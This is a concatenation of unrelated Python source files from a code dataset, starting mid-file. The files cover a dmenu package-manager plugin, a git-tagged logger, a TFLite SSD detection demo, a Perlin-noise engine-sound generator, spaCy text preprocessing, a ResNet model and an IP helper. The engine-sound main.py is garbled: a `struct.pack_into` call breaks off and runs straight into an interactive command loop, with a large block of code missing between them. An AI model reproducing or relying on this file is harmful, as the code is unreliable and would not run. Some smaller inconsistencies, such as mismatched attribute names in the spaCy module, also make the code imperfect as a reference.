\" + package[4:]\n                else:\n                    out.append(last)\n                    last = package\n        out.append(last)\n        return sorted(set(out[1:]))\n\n    def availablePackages_portage(self):\n        os.system(self.command_listAvailable)\n        packages = self.command_output('cat ' + dmenu_extended.path_cache + '/tmp.txt')\n        os.system('rm ' + dmenu_extended.path_cache + '/tmp*')\n        return packages\n\n    def rebuild_notice(self):\n        # gnome-terminal forks from the calling process so this message shows\n        # before the action has completed.\n        if self.prefs['terminal'] != 'gnome-terminal':\n            rebuild = self.menu([\"Cache may be out-of-date, rebuild at your convenience.\", \"* Rebuild cache now\"])\n            if rebuild == \"* Rebuild cache now\":\n                self.cache_regenerate()\n\n    def run(self, inputText):\n\n        if self.detected_packageManager == False:\n            self.menu([\"Your system package manager could not be determined\"])\n            return\n        else:\n            print('Detected system package manager as ' + str(self.detected_packageManager))\n\n        items = [self.prefs['indicator_submenu'] + ' Install a new package',\n                 self.prefs['indicator_submenu'] + ' Uninstall a package',\n                 self.prefs['indicator_submenu'] + ' Update a package',\n                 'Rebuild the package cache',\n                 'Perform system upgrade']\n\n        selectedIndex = self.select(items, prompt='Action:', numeric=True)\n\n        if selectedIndex != -1:\n            if selectedIndex == 0:\n                self.install_package()\n            elif selectedIndex == 1:\n                self.remove_package()\n            elif selectedIndex == 2:\n                self.update_package()\n            elif selectedIndex == 3:\n                self.build_package_cache()\n            elif selectedIndex == 4:\n                self.update_system()\n","sub_path":"plugin_systemPackageManager.py","file_name":"plugin_systemPackageManager.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379418149","text":"#from config import *\nimport logging\nimport datetime\nimport subprocess\nimport os\n\n#Make Log File\nsubprocess.call(\"mkdir -p logs\", shell = True)\n\n#Get Date for Filenames\nnow = datetime.datetime.now()\ndate = now.strftime(\"%Y-%m-%d\")\n\n
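#A pure-Python alternative to the shell mkdir above, as a sketch (creates the\n#same 'logs' directory without spawning a shell):\n#   os.makedirs('logs', exist_ok=True)\n\n#Bash 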
Commands\n#commit == git rev-parse HEAD\n#branch == git rev-parse --abbrev-ref HEAD\ncommit = str(subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"]).strip()).replace(\"b'\", \"\").replace(\"'\", \"\")[0:7]\nbranch = str(subprocess.check_output([\"git\", \"rev-parse\", \"--abbrev-ref\", \"HEAD\"]).strip()).replace(\"b'\", \"\").replace(\"'\", \"\")\next = \"log\"\n\n#Logfilename\nlogfilename = \"logs/OpenFEC_report_{}_{}_{}.{}\".format(date, branch, commit, ext)\n\n#Set Logger\nlogging.basicConfig(level=logging.INFO, format='%(message)s')\nlogger = logging.getLogger()\nlogger.addHandler(logging.FileHandler(logfilename, 'a'))\nprint = logger.info\n\n","sub_path":"fec_download/_util/setlogger.py","file_name":"setlogger.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"325098561","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 11 08:54:47 2020\n\n@author: essys\n\"\"\"\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\nimport cv2\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport pathlib\nimport matplotlib.pyplot as plt\nfrom box_utils import decode, compute_nms\nimport yaml\nfrom anchor import generate_default_boxes, get_anchors, get_default_params\nfrom scipy.special import softmax\n\n\n\ntflite_model_file = \"./ssd.quant.tflite\"\n\ninterpreter = tf.lite.Interpreter(model_path=str(tflite_model_file))\ninterpreter.allocate_tensors()\n\n\ninput_index = interpreter.get_input_details()[0][\"index\"]\np_conf_index = interpreter.get_output_details()[0][\"index\"]\np_boxes_index = interpreter.get_output_details()[1][\"index\"]\n\n\n\nimg = cv2.imread(\"/home/essys/Pictures/picture.jpeg\", -1)\n\nimg = cv2.resize(img, (300,300))\ninput_details = interpreter.get_input_details()[0]\n\ninput_scale, input_zero_point = input_details[\"quantization\"]\ntest_image = img/127.0 -1.0\ntest_image = test_image / input_scale + input_zero_point\n \n# feed the quantized image (not the raw one) to the interpreter\ntest_image = np.expand_dims(test_image, axis=0).astype(input_details[\"dtype\"]) \ninterpreter.set_tensor(input_index, test_image)\ninterpreter.invoke()\n\n\np_conf = interpreter.get_tensor(p_conf_index)\np_boxes = interpreter.get_tensor(p_boxes_index)\n# apply scaling dequantization\n# real value = (int8val - zeropoint) x scale\np_conf = (p_conf - np.float32(interpreter.get_output_details()[0]['quantization'][1])) * np.float32(interpreter.get_output_details()[0]['quantization'][0])\np_boxes = (p_boxes - np.float32(interpreter.get_output_details()[1]['quantization'][1])) *np.float32( interpreter.get_output_details()[1]['quantization'][0])\n\nwith open('./config.yml') as f:\n    cfg = yaml.load(f, Loader=yaml.SafeLoader)\n\ntry:\n    config = cfg['SSD300']#[args.arch.upper()]\nexcept AttributeError:\n    raise ValueError('Unknown architecture:') \ndefault_boxes = generate_default_boxes(config)\nnewres = decode(default_boxes, p_boxes[0]).numpy()\nconf = softmax(p_conf, -1)[0]\nclasses = np.argmax(conf, -1)\n\n# sort and filter detections: keep scores >= threshold, top-N\ndef det_sort_filt(boxes, conf, classes, topn =100, threshold=0.5):\n    # one class\n    conf = conf[:, 1:]\n    scores = np.squeeze(conf)\n    \n    #filter 1 classes\n    mask1 = classes == 1\n    mask2 = scores >= threshold\n    mask = np.logical_and(mask1, mask2)\n    boxes = boxes[mask]\n    scores = scores[mask]\n    classes = classes[mask]\n    # scores = np.max(conf, -1)\n    # print(scores, conf)\n    # sort\n    idxes = np.argsort(-scores)\n    idxes = idxes[:topn]\n    # print(idxes)\n
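    # conf =conf[idxes]\n    # Fancy-indexing with the argsort order is what implements top-N selection\n    # below; a minimal sketch of the idiom with made-up scores:\n    #   s = np.array([0.2, 0.9, 0.5]); order = np.argsort(-s)[:2]\n    #   s[order]  # -> array([0.9, 0.5])\n    classes 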
=classes[idxes]\n scores =scores[idxes]\n boxes =boxes[idxes]\n \n \n return classes, scores, boxes\nclasses, scores, boxes = det_sort_filt(newres, conf, classes)\n# now apply nms\ndef bboxes_nms(classes, scores, bboxes, nms_threshold=0.45):\n \"\"\"Apply non-maximum selection to bounding boxes.\n \"\"\"\n keep_bboxes = np.ones(scores.shape, dtype=np.bool)\n for i in range(scores.size-1):\n if keep_bboxes[i]:\n # Computer overlap with bboxes which are following.\n overlap = bboxes_jaccard(bboxes[i], bboxes[(i+1):])\n # Overlap threshold for keeping + checking part of the same class\n keep_overlap = np.logical_or(overlap < nms_threshold, classes[(i+1):] != classes[i])\n keep_bboxes[(i+1):] = np.logical_and(keep_bboxes[(i+1):], keep_overlap)\n\n idxes = np.where(keep_bboxes)\n return classes[idxes], scores[idxes], bboxes[idxes]\n\n\ndef bboxes_jaccard(bboxes1, bboxes2):\n \"\"\"Computing jaccard index between bboxes1 and bboxes2.\n Note: bboxes1 and bboxes2 can be multi-dimensional, but should broacastable.\n \"\"\"\n bboxes1 = np.transpose(bboxes1)\n bboxes2 = np.transpose(bboxes2)\n # Intersection bbox and volume.\n int_ymin = np.maximum(bboxes1[0], bboxes2[0])\n int_xmin = np.maximum(bboxes1[1], bboxes2[1])\n int_ymax = np.minimum(bboxes1[2], bboxes2[2])\n int_xmax = np.minimum(bboxes1[3], bboxes2[3])\n\n int_h = np.maximum(int_ymax - int_ymin, 0.)\n int_w = np.maximum(int_xmax - int_xmin, 0.)\n int_vol = int_h * int_w\n # Union volume.\n vol1 = (bboxes1[2] - bboxes1[0]) * (bboxes1[3] - bboxes1[1])\n vol2 = (bboxes2[2] - bboxes2[0]) * (bboxes2[3] - bboxes2[1])\n jaccard = int_vol / (vol1 + vol2 - int_vol)\n return jaccard\n\nclasses, scores, boxes = bboxes_nms(classes, scores, boxes, nms_threshold=0.45)\n\n# classes, scores, boxes = ssd_bboxes_select_layer(classes, boxes, scores)\n\n\nimg = cv2.imread(\"/home/essys/Pictures/picture.jpeg\", -1)\n\nimg = cv2.resize(img, (300,300))\n\ndef draw_image(img, bboxes, classes, mode = 'gt'):\n h,w,c = np.shape(img)\n for i in range(len(bboxes)):\n bbox = bboxes[i]\n x1,y1, x2,y2 = bbox \n # x1,y1, x2,y2 = x1, y1-y2/2,x1 + x2/2,y1 + y2/2\n x1,y1,x2,y2 = int(x1 * w), int(y1 * h), int(x2 * w), int(y2 * h)\n print(x1, x2, y1, y2, mode)\n cv2.rectangle(img, (x1, y1), (x2, y2), (255,0,0), 2) \n cv2.rectangle(img, (x1, y1), (x1+10, y1+15), (0,0,0), -1) \n if(type(classes[i]) in [np.int64, np.int32, np.int8, int]): \n cv2.putText(img,str(classes[i]), (x1,y1+10),1, 1.0, (255,255,255))\n else:\n cv2.putText(img,str(classes[i].numpy()), (x1,y1+10),1, 1.0, (255,255,255)) \n\n# NUM_CLASSES = 2\n# newres = decode(default_boxes, newres).numpy()\n\n# confs = tf.math.softmax(p_conf[0], axis=-1)\n# classes = tf.math.argmax(confs, axis=-1)\n# scores = tf.math.reduce_max(confs, axis=-1)\n \n# out_boxes = []\n# out_labels = []\n# out_scores = []\n# # print(confs.shape,classes.shape, scores.shape, boxes.shape)\n# for c in range(1, NUM_CLASSES):\n# cls_scores = confs[:, c]\n\n# score_idx = cls_scores > 0.8\n# # cls_boxes = tf.boolean_mask(boxes, score_idx)\n# # cls_scores = tf.boolean_mask(cls_scores, score_idx)\n# cls_boxes = newres[score_idx]\n# cls_scores = cls_scores[score_idx]\n\n# nms_idx = compute_nms(cls_boxes, cls_scores, 0.35, 200)\n# cls_boxes = tf.gather(cls_boxes, nms_idx)\n# cls_scores = tf.gather(cls_scores, nms_idx)\n# cls_labels = [c] * cls_boxes.shape[0]\n\n# out_boxes.append(cls_boxes)\n# out_labels.extend(cls_labels)\n# out_scores.append(cls_scores)\n\n# out_boxes = tf.concat(out_boxes, axis=0)\n# out_scores = tf.concat(out_scores, axis=0)\n\n# boxes 
= tf.clip_by_value(out_boxes, 0.0, 1.0).numpy()\n# classes = np.array(out_labels)\n# scores = out_scores.numpy()\n\ndraw_image(img, boxes, classes)\nplt.imshow(img)\nplt.show()","sub_path":"quant_show.py","file_name":"quant_show.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"331025089","text":"import noise\nimport pyaudio\nimport struct\nimport math\nimport time\nimport sys\n\n# At the rate we are going, this is exactly one second's worth of data.\nSAMPLE_RATE = 44100\n\nSAMPLE_SIZE = 4\nFRAME_SIZE = SAMPLE_SIZE\n\n# Frequency in hertz\nSTART_FREQUENCY = 220\n\n# Hz / second\nANIM_RATE = 1\n\nclass FreqConst:\n    def __init__(self):\n        pass\n    def is_done(self):\n        return False\n    def next(self, dt, old_val):\n        return old_val\n\nclass FreqAnimator:\n\n    INIT_STATE = 'init'\n    RUNNING_STATE = ''\n    DONE_STATE = 'done'\n\n    def __init__(self, rate, *states):\n        self.states = list(states)\n        # Amount of time in seconds to add a hertz.\n        self.time_step = 1 / rate\n\n        # We are only partially initialized, we only start when the user first\n        # calls next.\n        self.anim_state = FreqAnimator.INIT_STATE\n\n    def reset(self):\n        self.anim_state = FreqAnimator.INIT_STATE\n\n    def is_done(self):\n        return self.anim_state == FreqAnimator.DONE_STATE\n\n    def next(self, dt, old_val):\n        if self.anim_state == FreqAnimator.INIT_STATE:\n            # This is our starting value!\n            self.cur_value = old_val\n\n            # Move towards the goal of state 0, starting without progress.\n            self.state_i = 0\n            self.state_progress = 0\n            self.accum_time = 0.0\n\n            # We are not done, and not partially initialized, which is sorta\n            # what the init state signifies\n            self.anim_state = FreqAnimator.RUNNING_STATE\n\n        # As long as we are not done, do stuff, otherwise skip it all\n        if self.anim_state != FreqAnimator.DONE_STATE:\n            # Accumulate the time\n            self.accum_time += dt\n\n            # Time to do something\n            if self.accum_time >= self.time_step:\n                # We handled some time, so remove it for next time\n                self.accum_time -= self.time_step\n\n                # How much do we have to add total?\n                goal = self.states[self.state_i]\n\n                if goal == 0:\n                    # Skip this state, and move on, since we've already technically\n                    # satisfied it.\n                    self.state_i += 1\n                    if self.state_i >= len(self.states):\n                        # We've gone through every state\n                        self.anim_state = FreqAnimator.DONE_STATE\n                else:\n                    # This will either be 1 or -1, it tells us how much to add to the\n                    # old value.\n                    direction = goal // abs(goal)\n\n                    # How much have we moved?\n                    self.state_progress += direction\n\n                    # Do the move\n                    self.cur_value += direction\n\n                    # Have we moved enough?\n                    if abs(self.state_progress) >= abs(goal):\n                        # Continue to the next state.\n                        self.state_i += 1\n                        # Reset our progress, but not our accumulated time.\n                        self.state_progress = 0\n\n                        if self.state_i >= len(self.states):\n                            # We've gone through every state\n                            self.anim_state = FreqAnimator.DONE_STATE\n\n        # When we are done, this will just stay constant, so we don't have to\n        # worry about it.\n        return self.cur_value\n\ndef square(t, f):\n    return 4 / math.pi * (math.sin(2 * math.pi * f * t) +\n            1 / 3 * math.sin(6 * math.pi * f * t) +\n            1 / 5 * math.sin(10 * math.pi * f * t))\n\nclass InactiveGeneratorError(Exception):\n    pass\n\nclass GeneratorAudio:\n\n    STATE_OFF = 'off'\n    STATE_STEADY = 'steady'\n    STATE_GOING_UP = 'up'\n    STATE_GOING_DOWN = 'down'\n\n    def __init__(self, cur_freq = START_FREQUENCY, anim_rate = ANIM_RATE):\n        self.last_time = 0.0\n        self.buf = bytearray(0)\n        self.state = GeneratorAudio.STATE_OFF\n        self.cur_freq = cur_freq\n\n        self.const_freq_anim = FreqConst()\n
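        # Each FreqAnimator walks the frequency through a list of signed deltas;\n        # e.g. (100, -150, 70) nets +20 Hz overall. A tiny usage sketch with a\n        # hypothetical rate of 2 Hz/s (so time_step is 0.5 s, one Hz per tick):\n        #   anim = FreqAnimator(2, 10, -5)\n        #   f = 220.0\n        #   while not anim.is_done():\n        #       f = anim.next(0.5, f)\n        self.up_freq_anim = 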
FreqAnimator(anim_rate, 100, -150, 70)\n self.down_freq_anim = FreqAnimator(anim_rate, -100, 150, -70)\n\n self.debug_file = None\n\n def write_audio(self, fo):\n self.debug_file = fo\n\n def step_up(self):\n if self.is_active():\n if self.state != GeneratorAudio.STATE_GOING_UP:\n # Reset animation.\n self.up_freq_anim.reset()\n\n self.state = GeneratorAudio.STATE_GOING_UP\n else:\n raise InactiveGeneratorError()\n\n def step_down(self):\n if self.is_active():\n if self.state != GeneratorAudio.STATE_GOING_DOWN:\n # Reset animation.\n self.down_freq_anim.reset()\n\n self.state = GeneratorAudio.STATE_GOING_DOWN\n else:\n raise InactiveGeneratorError()\n\n def is_active(self):\n return self.state != GeneratorAudio.STATE_OFF\n\n def start(self):\n if not self.is_active():\n self.state = GeneratorAudio.STATE_STEADY\n def stop(self):\n if self.is_active():\n self.state = GeneratorAudio.STATE_OFF\n\n def pa_callback(self, in_data, frame_count, time_info, status):\n if self.is_active():\n # Return noises\n return self.aud_cb(frame_count), pyaudio.paContinue\n else:\n # Return silence\n return bytes(frame_count * FRAME_SIZE), pyaudio.paContinue\n\n def aud_cb(self, frame_count):\n # Resize the buffer if necessary.\n if frame_count * FRAME_SIZE != len(self.buf):\n self.buf = bytearray(frame_count * FRAME_SIZE)\n\n freq = self.cur_freq\n\n freq_anim = self.const_freq_anim\n if self.state == GeneratorAudio.STATE_GOING_UP:\n # We are going up, set up that 'animator'.\n freq_anim = self.up_freq_anim\n elif self.state == GeneratorAudio.STATE_GOING_DOWN:\n # We are going down, etc.\n freq_anim = self.down_freq_anim\n\n # Generate some data\n for i in range(frame_count):\n dt = i / SAMPLE_RATE\n cur_time = self.last_time + dt\n\n val = square(cur_time, freq) * .02 + \\\n noise.pnoise1(cur_time * freq, octaves=5,\n persistence=.95,lacunarity=2.0) * .98\n val *= 1.1\n struct.pack_into(' ')\n except KeyboardInterrupt:\n # Clear the line so the user's prompt doesn't show up on the same\n # line.\n sys.stdout.write('\\n')\n sys.stdout.flush()\n cmd = \"quit\"\n\n # Step up the \"engine\"\n if cmd == 'start':\n print('Starting engine...')\n eng.start()\n elif cmd == 'stop':\n print('Stopping engine...')\n eng.stop()\n elif cmd == 'step':\n print('Stepping up...')\n eng.step_up()\n # Step down the \"engine\"\n elif cmd == 'down':\n print('Stepping down...')\n eng.step_down()\n # Print engine information\n elif cmd == 'status':\n # This happens every iteration, just be quiet about it.\n pass\n # Quit the program\n elif cmd == \"quit\":\n print(\"Quitting...\")\n break\n # Read the source code!\n elif cmd == 'help':\n print('No help for you!')\n else:\n print('Unknown command, try again!')\n\n print('Engine state:', eng.state, 'Freq:', eng.cur_freq)\n\n # Clean up\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"226620577","text":"\"\"\"Functions for spaCy language processing pipeline and computing\ncosine similarity on spacy `Doc`s' word embeddings.\n\"\"\"\n\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom typing import List\nfrom typing import Mapping\nfrom typing import Union\nfrom .utils import cosine_similarity\nfrom .utils import normalise_vector\n\nfrom spacy.language import Language\nfrom spacy.tokens import Doc\n\n\n# Selected POS tags (https://universaldependencies.org/u/pos/)\nPARTS_OF_SPEECH = []\n\n# 
Spacy pipe parameters\nPIPE_PARAMS = {'n_process': 1,\n 'batch_size': 50}\n\n\ndef spacy_preprocessor(\n texts: List[str],\n nlp: Language,\n disable: List[str] = ['ner', 'parser', 'textcat'],\n make_lemma: bool = True,\n make_lowercase: bool = True,\n keep_alpha: bool = True,\n keep_pos: List[str] = PARTS_OF_SPEECH,\n remove_punctuation: bool = True,\n remove_stopwords: bool = True,\n pipe_params: Mapping[str, object] = PIPE_PARAMS\n) -> List[Doc]:\n \"\"\"Given a list of text strings, returns a list of processed spaCy `Doc`\n objects (one for each text). A `Doc` object is a sequence of Token objects\n with methods to access Tokens' information (both original and processed)\n and to perform NLP tasks (e.g. words vector and similarity).\n\n An custom pipeline component is added to register a custom extention\n on the Doc. This custom extention (`Doc._.selected_tokens`) contains tokens\n that satisfy the `keep_words, `keep_pos`, `remove_punctuation`, and\n `remove_stopwords` conditions. Note that these conditions do not produce\n disjoint sets of tokens (e.g. only keeping NOUNS with `pos` logically\n excludes all punctuation).\n\n Note: if the conditions above are all False or None, then\n `Doc._.selected_tokens` contains all tokens that matches with the\n regular expression (\\\\w+)\n\n Args:\n texts (list of str): \n List of text strings to process.\n\n nlp (spaCy Language object): \n Pre-trained spaCy model (https://spacy.io/usage/models).\n\n disable (list of str): \n Names of spaCy pipeline components to disable.\n\n make_lemmas (bool): \n If True, adds tokens' lemma into the\n custom extention `Doc._.selected_tokens`;\n defaults to True. If False, disables spaCy's lemmatizer pipeline\n component (even if it not included in `disable`) and adds\n tokens' original text into the custom extention\n Doc._.selected_tokens.\n\n make_lowercase (bool): \n If True, converts all tokens in custom extension\n Doc._selected_tokens into lowercase.\n\n keep_alpha (bool): \n If True, only tokens with alphabetic characters are\n kept in the custom extention `Doc._.selected_tokens`\n\n keep_pos (list of str): \n Only tokens with parts-of-speech tags in `keep_pos`\n are kept in the custom extention `Doc._.selected_tokens`.\n If `keep_pos` is empty, adds all tokens regardless of its\n part-of-speech tag. Defaults to `PARTS_OF_SPEECH = []`.\n\n remove_punctuation (bool): \n If True, removes all punctuation in the custom extention\n Doc._.selected_tokens; defaults to True.\n\n remove_stopwords (bool): \n If True, removes stopword tokens in the custom extention\n `Doc._.selected_tokens`; defaults to False. Stopword removal\n seems to be computationally expensive. 
Avoid using this\n unless necessary.\n\n pipe_params (Kwargs in `spacy.language.Language.pipe`): \n See https://spacy.io/api/language#pipe\n\n Returns:\n A list of processed spaCy Doc objects.\n\n References: https://spacy.io/usage/processing-pipelines\n \"\"\"\n component_config = {'filters': {\n 'make_lemma': make_lemma,\n 'make_lowercase': make_lowercase,\n 'keep_alpha': keep_alpha,\n 'keep_pos': keep_pos,\n 'remove_punctuation': remove_punctuation,\n 'remove_stopwords': remove_stopwords}}\n component_name = 'filter'\n if not(component_name in nlp.pipe_names):\n # Add custom component\n nlp.add_pipe('filter', config=component_config, last=True)\n docs = []\n for doc in tqdm(nlp.pipe(texts,\n disable=disable,\n **PIPE_PARAMS),\n total=len(texts)):\n docs.append(doc)\n return docs\n\n\ndef spacy_similarity(docs: List[Doc],\n text: str,\n nlp: Language,\n norm: Union[None, str] = \"l2\") -> List[float]:\n \"\"\"Given a list of text in `docs` and `text` string,\n returns list of cosine similarity scores to `text`. Order of elements\n are left unchanged (i.e. identical to `docs`).\n\n Note: `norm` can be set to \"l1\", \"l2\", or \"max\" to scale vectors using\n the l1, l2, and max norm. Defaults to \"l2\".\n If None, vectors are not normalised.\n \"\"\"\n\n def normalise(norm):\n def _normalise(v):\n # Numba linear algebra operations are only supported on\n # contiguous arrays\n v = np.ascontiguousarray(v)\n return normalise_vector(v, order)\n if norm == 'l1':\n order = 1\n if norm == 'l2':\n order = 2\n return _normalise\n\n query_doc = nlp(text) # Convert text into a spaCy Doc object\n u = query_doc.vector\n vectors = list(map(\n lambda doc: np.average([np.array(token.vector_) for token\n in doc._.filtered_matches], axis=0), docs))\n if norm:\n func = normalise(norm)\n u = func(u)\n vectors = list(map(lambda v: func(v), vectors))\n scores = list(map(lambda v: cosine_similarity(u, v)\n if not(np.isnan(v).any()) else 0, vectors))\n return scores\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"src/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"79635190","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\nimport Utils\n\n\nclass BN_Conv2d(nn.Module):\n \"\"\"\n BN_CONV, default activation is ReLU\n \"\"\"\n\n def __init__(self, in_channels: object, out_channels: object, kernel_size: object, stride: object, padding: object,\n dilation=1, groups=1, bias=False, activation=True) -> object:\n super(BN_Conv2d, self).__init__()\n layers = [nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, groups=groups, bias=bias),\n nn.BatchNorm2d(out_channels)]\n if activation:\n layers.append(nn.ReLU(inplace=False))\n self.seq = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.seq(x)\n\n\nclass BN_Conv2d_Leaky(nn.Module):\n \"\"\"\n BN_CONV_LeakyRELU\n \"\"\"\n\n def __init__(self, in_channels: object, out_channels: object, kernel_size: object, stride: object, padding: object,\n dilation=1, groups=1, bias=False) -> object:\n super(BN_Conv2d_Leaky, self).__init__()\n self.seq = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, groups=groups, bias=bias),\n nn.BatchNorm2d(out_channels)\n )\n\n def forward(self, x):\n return 
F.leaky_relu(self.seq(x))\n\n\nclass SE(nn.Module):\n\n    def __init__(self, in_chnls, ratio):\n        super(SE, self).__init__()\n        self.squeeze = nn.AdaptiveAvgPool2d((1, 1))\n        self.compress = nn.Conv2d(in_chnls, in_chnls // ratio, 1, 1, 0)\n        self.excitation = nn.Conv2d(in_chnls // ratio, in_chnls, 1, 1, 0)\n\n    def forward(self, x):\n        out = self.squeeze(x)\n        out = self.compress(out)\n        out = F.relu(out)\n        out = self.excitation(out)\n        return torch.sigmoid(out)\n\nclass BasicBlock(nn.Module):\n    \"\"\"\n    basic building block for ResNet-18, ResNet-34\n    \"\"\"\n    message = \"basic\"\n\n    def __init__(self, in_channels, out_channels, strides, is_se=False):\n        super(BasicBlock, self).__init__()\n        self.is_se = is_se\n        self.conv1 = BN_Conv2d(in_channels, out_channels, 3, stride=strides, padding=1, bias=False)  # same padding\n        self.conv2 = BN_Conv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=False, activation=False)\n        if self.is_se:\n            self.se = SE(out_channels, 16)\n\n        # fit input with residual output\n        self.short_cut = nn.Sequential()\n        if strides != 1:\n            self.short_cut = nn.Sequential(\n                nn.Conv2d(in_channels, out_channels, 1, stride=strides, padding=0, bias=False),\n                nn.BatchNorm2d(out_channels)\n            )\n\n    def forward(self, x):\n        out = self.conv1(x)\n        out = self.conv2(out)\n        if self.is_se:\n            coefficient = self.se(out)\n            out = out * coefficient\n        out = out + self.short_cut(x)\n        return F.relu(out)\n\n\nclass BottleNeck(nn.Module):\n    \"\"\"\n    BottleNeck block for ResNet-50, ResNet-101, ResNet-152\n    \"\"\"\n    message = \"bottleneck\"\n\n    def __init__(self, in_channels, out_channels, strides, is_se=False):\n        super(BottleNeck, self).__init__()\n        self.is_se = is_se\n        self.conv1 = BN_Conv2d(in_channels, out_channels, 1, stride=1, padding=0, bias=False)  # same padding\n        self.conv2 = BN_Conv2d(out_channels, out_channels, 3, stride=strides, padding=1, bias=False)\n        self.conv3 = BN_Conv2d(out_channels, out_channels * 4, 1, stride=1, padding=0, bias=False, activation=False)\n        if self.is_se:\n            self.se = SE(out_channels * 4, 16)\n\n        # fit input with residual output\n        self.shortcut = nn.Sequential(\n            nn.Conv2d(in_channels, out_channels * 4, 1, stride=strides, padding=0, bias=False),\n            nn.BatchNorm2d(out_channels * 4)\n        )\n\n    def forward(self, x):\n        out = self.conv1(x)\n        out = self.conv2(out)\n        out = self.conv3(out)\n        if self.is_se:\n            coefficient = self.se(out)\n            out = out * coefficient\n        out = out + self.shortcut(x)\n        return F.relu(out)\n\n\n\nclass ResNet(nn.Module):\n    \"\"\"\n    builds ResNet-18/34/50/101/152 from a block type and group sizes\n    \"\"\"\n\n    def __init__(self, block: object, groups: object, num_classes, is_se=False) -> object:\n        super(ResNet, self).__init__()\n        self.channels = 64  # out channels from the first convolutional layer\n        self.block = block\n        self.is_se = is_se\n\n        self.conv1 = nn.Conv2d(3, self.channels, 7, stride=2, padding=3, bias=False)\n        self.bn = nn.BatchNorm2d(self.channels)\n        self.pool1 = nn.MaxPool2d(3, 2, 1)\n        self.conv2_x = self._make_conv_x(channels=64, blocks=groups[0], strides=1, index=2)\n        self.conv3_x = self._make_conv_x(channels=128, blocks=groups[1], strides=2, index=3)\n        self.conv4_x = self._make_conv_x(channels=256, blocks=groups[2], strides=2, index=4)\n        self.conv5_x = self._make_conv_x(channels=512, blocks=groups[3], strides=2, index=5)\n        self.pool2 = nn.AvgPool2d(7)\n        patches = 512 if self.block.message == \"basic\" else 512 * 4\n        self.fc = nn.Linear(patches, num_classes)  # for 224 * 224 input size\n\n    def _make_conv_x(self, channels, blocks, strides, index):\n        \"\"\"\n        making convolutional group\n
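        Example (a sketch): for ResNet-18, conv3_x has blocks=2 and strides=2,\n        so list_strides == [2, 1] -- the first block downsamples and the rest\n        keep the resolution.\n        :param 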
channels: output channels of the conv-group\n :param blocks: number of blocks in the conv-group\n :param strides: strides\n :return: conv-group\n \"\"\"\n list_strides = [strides] + [1] * (blocks - 1) # In conv_x groups, the first strides is 2, the others are ones.\n conv_x = nn.Sequential()\n for i in range(len(list_strides)):\n layer_name = str(\"block_%d_%d\" % (index, i)) # when use add_module, the name should be difference.\n conv_x.add_module(layer_name, self.block(self.channels, channels, list_strides[i], self.is_se))\n self.channels = channels if self.block.message == \"basic\" else channels * 4\n return conv_x\n\n def forward(self, x):\n out = self.conv1(x)\n out = F.relu(self.bn(out))\n out = self.pool1(out) # 56*56\n out = self.conv2_x(out)\n out = self.conv3_x(out)\n out = self.conv4_x(out)\n out = self.conv5_x(out) # 7*7\n out = self.pool2(out)\n out = out.view(out.size(0), -1)\n out = F.softmax(self.fc(out))\n return out\n\n\ndef ResNet_18(num_classes=1000):\n return ResNet(block=BasicBlock, groups=[2, 2, 2, 2], num_classes=num_classes)\n\n\ndef ResNet_34(num_classes=1000):\n return ResNet(block=BasicBlock, groups=[3, 4, 6, 3], num_classes=num_classes)\n\n\ndef ResNet_50(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 4, 6, 3], num_classes=num_classes)\n\n\ndef ResNet_101(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 4, 23, 3], num_classes=num_classes)\n\n\ndef ResNet_152(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 8, 36, 3], num_classes=num_classes)\n\n\ndef ResNet_50_SE(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 4, 6, 3], num_classes=num_classes, is_se=True)\n\n\ndef test():\n net = ResNet_18()\n # net = ResNet_34()\n # net = ResNet_50()\n # net = ResNet_101()\n # net = ResNet_152()\n # net = ResNet_50_SE()\n # net = ResNet_50()\n\n summary(net, (3, 224, 224))\n ins = torch.randn([1, 3, 224, 224], dtype=torch.float32)\n flops_res, param_res = Utils.count_flops_param(net, ins)\n #\n print(\"ResNeXt flops= {0},v1 param = {1} \".format(flops_res, param_res))\n\n # net = torchvision.models.resnet34(pretrained=False)\n # print(net)\n # summary(net, (3, 224, 224))\n\n\nif __name__ == '__main__':\n test()\n # net = ResNet_18(2)\n # Utils.test_model(epoch=20, model=net, size=(224, 224))\n","sub_path":"ResNext.py","file_name":"ResNext.py","file_ext":"py","file_size_in_byte":7941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409547870","text":"def cortarIp(ip):\n ip2 = ''\n for c in range(len(ip)):\n if ip[c] != '.':\n ip2 = ip2 + ip[c]\n else:\n ip2 = ip2 + ' '\n lista = list(ip2.split())\n print('lista cortada com sucesso', lista)\n return lista\n\n\ndef converterInteiro(lista):\n for i in range(0, 3):\n lista[i] = int(lista[i])\n print('Lista convetida inteiro', lista)\n return lista\n\n\ndef criaIps(lista):\n lista_ips = 